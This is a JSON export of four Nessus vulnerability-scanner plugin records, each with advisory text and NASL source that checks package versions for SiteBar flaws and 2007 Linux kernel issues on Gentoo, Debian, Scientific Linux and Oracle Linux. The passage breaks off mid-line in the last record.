{"nessus": [{"lastseen": "2019-01-16T20:07:43", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200711-05\n(SiteBar: Multiple issues)\n\n Tim Brown discovered these multiple issues: the translation module does\n not properly sanitize the value to the 'dir' parameter (CVE-2007-5491,\n CVE-2007-5694); the translation module also does not sanitize the\n values of the 'edit' and 'value' parameters which it passes to eval()\n and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does\n not validate the URL to redirect users to after logging in\n (CVE-2007-5695); SiteBar also contains several cross-site scripting\n vulnerabilities (CVE-2007-5692).\nImpact :\n\n An authenticated attacker in the 'Translators' or 'Admins' group could\n execute arbitrary code, read arbitrary files and possibly change their\n permissions with the privileges of the user running the web server by\n passing a specially crafted parameter string to the 'translator.php'\n file. An unauthenticated attacker could entice a user to browse a\n specially crafted URL, allowing for the execution of script code in the\n context of the user's browser, for the theft of browser credentials or\n for a redirection to an arbitrary website after login.\nWorkaround :\n\n There is no known workaround at this time.", "modified": "2018-08-10T00:00:00", "published": "2007-11-07T00:00:00", "id": "GENTOO_GLSA-200711-05.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27816", "title": "GLSA-200711-05 : SiteBar: Multiple issues", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200711-05.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27816);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_xref(name:\"GLSA\", value:\"200711-05\");\n\n script_name(english:\"GLSA-200711-05 : SiteBar: Multiple issues\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200711-05\n(SiteBar: Multiple issues)\n\n Tim Brown discovered these multiple issues: the translation module does\n not properly sanitize the value to the 'dir' parameter (CVE-2007-5491,\n CVE-2007-5694); the translation module also does not sanitize the\n values of the 'edit' and 'value' parameters which it passes to eval()\n and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does\n not validate the URL to redirect users to after logging in\n (CVE-2007-5695); SiteBar also contains several cross-site scripting\n vulnerabilities (CVE-2007-5692).\n \nImpact :\n\n An authenticated attacker in the 'Translators' or 'Admins' group could\n execute arbitrary code, read arbitrary files and possibly change their\n permissions with the privileges of the user running the web server by\n passing a specially crafted parameter string to the 'translator.php'\n file. 
An unauthenticated attacker could entice a user to browse a\n specially crafted URL, allowing for the execution of script code in the\n context of the user's browser, for the theft of browser credentials or\n for a redirection to an arbitrary website after login.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200711-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All SiteBar users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/sitebar-3.3.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(22, 59, 79, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sitebar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif 
(qpkg_check(package:\"www-apps/sitebar\", unaffected:make_list(\"ge 3.3.9\"), vulnerable:make_list(\"lt 3.3.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SiteBar\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:53", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in sitebar, a\nweb-based bookmark manager written in PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-5491\n A directory traversal vulnerability in the translation\n module allows remote authenticated users to chmod\n arbitrary files to 0777 via '..' sequences in the 'lang'\n parameter.\n\n - CVE-2007-5492\n A static code injection vulnerability in the translation\n module allows a remote authenticated user to execute\n arbitrary PHP code via the 'value' parameter.\n\n - CVE-2007-5693\n An eval injection vulnerability in the translation\n module allows remote authenticated users to execute\n arbitrary PHP code via the 'edit' parameter in an 'upd\n cmd' action.\n\n - CVE-2007-5694\n A path traversal vulnerability in the translation module\n allows remote authenticated users to read arbitrary\n files via an absolute path in the 'dir' parameter.\n\n - CVE-2007-5695\n An error in command.php allows remote attackers to\n redirect users to arbitrary websites via the 'forward'\n parameter in a 'Log In' action.\n\n - CVE-2007-5692\n Multiple cross site scripting flaws allow remote\n attackers to inject arbitrary script or HTML fragments\n into several scripts.", "modified": "2018-11-10T00:00:00", "published": "2007-12-11T00:00:00", "id": "DEBIAN_DSA-1423.NASL", "href": 
"https://www.tenable.com/plugins/index.php?view=single&id=29258", "title": "Debian DSA-1423-1 : sitebar - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1423. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29258);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_xref(name:\"DSA\", value:\"1423\");\n\n script_name(english:\"Debian DSA-1423-1 : sitebar - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in sitebar, a\nweb-based bookmark manager written in PHP. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2007-5491\n A directory traversal vulnerability in the translation\n module allows remote authenticated users to chmod\n arbitrary files to 0777 via '..' 
sequences in the 'lang'\n parameter.\n\n - CVE-2007-5492\n A static code injection vulnerability in the translation\n module allows a remote authenticated user to execute\n arbitrary PHP code via the 'value' parameter.\n\n - CVE-2007-5693\n An eval injection vulnerability in the translation\n module allows remote authenticated users to execute\n arbitrary PHP code via the 'edit' parameter in an 'upd\n cmd' action.\n\n - CVE-2007-5694\n A path traversal vulnerability in the translation module\n allows remote authenticated users to read arbitrary\n files via an absolute path in the 'dir' parameter.\n\n - CVE-2007-5695\n An error in command.php allows remote attackers to\n redirect users to arbitrary websites via the 'forward'\n parameter in a 'Log In' action.\n\n - CVE-2007-5692\n Multiple cross site scripting flaws allow remote\n attackers to inject arbitrary script or HTML fragments\n into several scripts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=447135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=448690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=448689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5492\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2007-5692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1423\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the sitebar package.\n\nFor the old stable distribution (sarge), these problems have been\nfixed in version 3.2.6-7.1sarge1.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 3.3.8-7etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(22, 59, 79, 94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sitebar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"sitebar\", reference:\"3.2.6-7.1sarge1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"sitebar\", reference:\"3.3.8-7etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:10", "bulletinFamily": "scanner", "description": "A flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n - when running the 'ls -la' command on an NFSv4 mount\n point, incorrect file attributes, and outdated file size\n and timestamp information were returned. 
As well,\n symbolic links may have been displayed as actual files.\n\n - a bug which caused the cmirror write path to appear\n deadlocked after a successful recovery, which may have\n caused syncing to hang, has been resolved.\n\n - a kernel panic which occurred when manually configuring\n LCS interfaces on the IBM S/390 has been resolved.\n\n - when running a 32-bit binary on a 64-bit system, it was\n possible to mmap page at address 0 without flag\n MAP_FIXED set. This has been resolved in these updated\n packages.\n\n - the Non-Maskable Interrupt (NMI) Watchdog did not\n increment the NMI interrupt counter in\n '/proc/interrupts' on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart\n at regular intervals.\n\n - a bug which caused the diskdump utility to run very\n slowly on devices using Fusion MPT has been resolved.", "modified": "2019-01-07T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20071219_KERNEL_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60335", "title": "Scientific Linux Security Update : kernel on SL4.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60335);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. 
In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n - when running the 'ls -la' command on an NFSv4 mount\n point, incorrect file attributes, and outdated file size\n and timestamp information were returned. As well,\n symbolic links may have been displayed as actual files.\n\n - a bug which caused the cmirror write path to appear\n deadlocked after a successful recovery, which may have\n caused syncing to hang, has been resolved.\n\n - a kernel panic which occurred when manually configuring\n LCS interfaces on the IBM S/390 has been resolved.\n\n - when running a 32-bit binary on a 64-bit system, it was\n possible to mmap page at address 0 without flag\n MAP_FIXED set. This has been resolved in these updated\n packages.\n\n - the Non-Maskable Interrupt (NMI) Watchdog did not\n increment the NMI interrupt counter in\n '/proc/interrupts' on systems running an AMD Opteron\n CPU. 
This caused systems running NMI Watchdog to restart\n at regular intervals.\n\n - a bug which caused the diskdump utility to run very\n slowly on devices using Fusion MPT has been resolved.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0712&L=scientific-linux-errata&T=0&P=2872\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84bb9a90\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:27", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:1104 :\n\nUpdated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. 
This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67619", "title": "Oracle Linux 4 : kernel (ELSA-2007-1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:1104 and \n# Oracle Linux Security Advisory ELSA-2007-1104 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67619);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"Oracle Linux 4 : kernel (ELSA-2007-1104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:1104 :\n\nUpdated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating 
system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. 
This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-December/000460.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-doc-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-doc-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", 
